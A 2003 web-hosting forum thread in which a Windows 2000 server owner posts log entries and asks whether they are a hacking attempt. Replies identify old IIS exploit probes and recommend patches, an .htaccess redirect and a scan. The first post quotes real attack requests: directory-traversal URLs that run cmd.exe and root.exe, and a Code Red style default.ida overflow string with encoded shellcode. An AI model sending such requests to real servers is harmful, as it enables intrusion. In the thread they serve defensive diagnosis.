hosted by liquidweb


Go Back   Web Hosting Talk : Web Hosting Main Forums : Hosting Security and Technology : My Server being hacked
Reply

Hosting Security and Technology Configuring and optimizing web hosting servers and operating systems, developing administration scripts, building servers, protecting against hackers, and general security (SSL certificates, etc.)
Forum Jump

My Server being hacked

Reply Post New Thread In Hosting Security and Technology Subscription
 
Send news tip View All Posts Thread Tools Search this Thread Display Modes
  #1  
Old 06-03-2003, 01:50 AM
Qumber Qumber is offline
Junior Guru Wannabe
 
Join Date: Apr 2003
Location: California
Posts: 61

My Server being hacked


I have been Monitoring My server Logs And I have Came Across Strange URLS ? Can some one Tell me is it a Hacking Attempt? what can I do for Prevention

Like
/scripts/root.exe /c+dir 404 -
GET /MSADC/root.exe /c+dir 404 -
GET /c/winnt/system32/cmd.exe /c+dir 404 -
GET /d/winnt/system32/cmd.exe /c+dir 404 -
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 404 -
GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
GET /winnt/system32/cmd.exe /c+dir 404 -
GET /winnt/system32/cmd.exe /c+dir 404 -
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -
GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90 90%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 404 -
GET /scripts/root.exe /c+dir 404 -
Attached Files
File Type: txt ex030602.txt (34.1 KB, 49 views)

Reply With Quote


Sponsored Links
  #2  
Old 06-03-2003, 01:58 AM
reseller reseller is offline
Web Hosting Guru
 
Join Date: Jul 2002
Posts: 288
No someone is trying to look for a windows exploit. You can add some code to your htaccess file to stop seeing that.

Put this in your .htaccess file and you wont see those anymore:

Reply With Quote
  #3  
Old 06-03-2003, 02:35 AM
sprintserve sprintserve is offline
Retired Moderator
 
Join Date: Jan 2003
Posts: 9,000
If you are not running a windows machine you are fine. Too many inept users on the net....

__________________
••• 100% Customer Satisfaction!!! •••
••• http://www.sprintserve.net •••
••• Offering: | Internap FCP Bandwidth! | Rebootless Kernel Updates! | Magento Optimized Hosting | •••
••• Services: | Managed Multiple Cores 64bit Servers | Server Management | •••

Reply With Quote
Sponsored Links
  #4  
Old 06-03-2003, 02:58 AM
Qumber Qumber is offline
Junior Guru Wannabe
 
Join Date: Apr 2003
Location: California
Posts: 61
But I am using WIn2k Not Unix

Reply With Quote
  #5  
Old 06-03-2003, 03:17 AM
MGCJerry MGCJerry is offline
Web Hosting Master
 
Join Date: Jan 2002
Posts: 2,998
Its an old IIS exploit. If you are running an older version of IIS, I'd worry about it, otherwise you are fine minus the wasted bandwidth. It looks as if you are fine, because the server is returning 404's (File Not Found).

I'm sure a more experienced user might be able to give more details.

Thanks for redirect reseller. I'm going to add this to my .htaccess to save on bandwidth.

__________________
Don't like what I say? Ignore me because it will be the only way you can shut me up.

Reply With Quote
  #6  
Old 06-03-2003, 03:29 AM
mlovick mlovick is offline
Web Hosting Master
 
Join Date: May 2001
Location: @ Work - Usually!
Posts: 835
Nice one reseller,

Thats a gr8 piece of info

Reply With Quote
  #7  
Old 06-03-2003, 06:38 AM
bear bear is offline
Community Leader
 
Join Date: Oct 2002
Location: cognito
Posts: 17,323
I had placed that htaccess into my cpanelskel folder so it loads into new client setups automatically.

Reply With Quote
  #8  
Old 06-03-2003, 06:42 AM
admin0 admin0 is offline
Web Hosting Master
 
Join Date: Dec 2001
Location: Singapore
Posts: 747
Quote:
Originally posted by reseller
No someone is trying to look for a windows exploit. You can add some code to your htaccess file to stop seeing that.

Put this in your .htaccess file and you wont see those anymore:
.. just wondering if anyone has something similar for win2k too..

__________________
███ .
███ .. ...
███
███ fulltime sysadmin since 1997!

Reply With Quote
  #9  
Old 06-03-2003, 07:28 AM
Qumber Qumber is offline
Junior Guru Wannabe
 
Join Date: Apr 2003
Location: California
Posts: 61
Yeah !!! Will Appreciate A Win2k Advise

__________________
Always In Control !!!

Reply With Quote
  #10  
Old 06-03-2003, 07:53 AM
reseller reseller is offline
Web Hosting Guru
 
Join Date: Jul 2002
Posts: 288
Win2K advice = stay up-to-date with patches and hotfixes. IIS has a security patch and a set of hot fixes for this issue.

IIS 5 is covered by default, IIS 4 needs to be patched.

When patched you should automatically get that protection

Reply With Quote
  #11  
Old 06-03-2003, 08:05 AM
reseller reseller is offline
Web Hosting Guru
 
Join Date: Jul 2002
Posts: 288
Here you go.

Look at, read, and follow the advice given here:

Click here

It's dated May 28, 2003 so it's pretty current.

It covers IIS 4, 5 and 5.1

Reply With Quote
  #12  
Old 06-03-2003, 09:00 AM
nogi nogi is offline
Web Hosting Master
 
Join Date: Feb 2002
Posts: 1,298
You can have your box scanned at https://sans20.qualys.com

John

Reply With Quote
  #13  
Old 06-03-2003, 09:01 AM
ub3r ub3r is offline
Disabled
 
Join Date: Dec 2002
Location: chica go go
Posts: 11,858
heh, i get all sorts of logs like that on my error_log, AND I'M USING APACHE! lmao

Reply With Quote
  #14  
Old 06-03-2003, 12:35 PM
sprintserve sprintserve is offline
Retired Moderator
 
Join Date: Jan 2003
Posts: 9,000
Quote:
Originally posted by bear
I had placed that htaccess into my cpanelskel folder so it loads into new client setups automatically.
just add it to your httpd.conf instead.

__________________
••• 100% Customer Satisfaction!!! •••
••• http://www.sprintserve.net •••
••• Offering: | Internap FCP Bandwidth! | Rebootless Kernel Updates! | Magento Optimized Hosting | •••
••• Services: | Managed Multiple Cores 64bit Servers | Server Management | •••

Reply With Quote
  #15  
Old 06-03-2003, 12:46 PM
bear bear is offline
Community Leader
 
Join Date: Oct 2002
Location: cognito
Posts: 17,323
Don't have root on every box, but a good idea on those I do. Thanks.

Reply With Quote
Reply

Related posts from TheWhir.com
Title Type Date Posted
SwaggSec Hackers Release 900 Admin Credentials from China Telecom Attack Web Hosting News 2012-06-04 15:24:03
Whistleblower Site Cryptome Hacked, Infects PCs with Drive-By Exploits Web Hosting News 2012-02-14 14:48:24
Security Firm ArtSec Launches Website and Server Migration Service Web Hosting News 2011-12-09 18:43:03
Bangladeshi Hacker TiGER-M@TE Targets InMotion Hosting Web Hosting News 2011-09-26 15:24:05
Toshiba Server Breach Compromises Email Information of 681 Customers Web Hosting News 2011-07-18 17:29:46


Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes
Postbit Selector

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Forum Jump
Login:
Log in with your username and password
Username:
Password:



Forgot Password?
Advertisement:
Web Hosting News:



 

X

Welcome to WebHostingTalk.com

Create your username to jump into the discussion!

WebHostingTalk.com is the largest, most influentual web hosting community on the Internet. Join us by filling in the form below.


(4 digit year)

Already a member?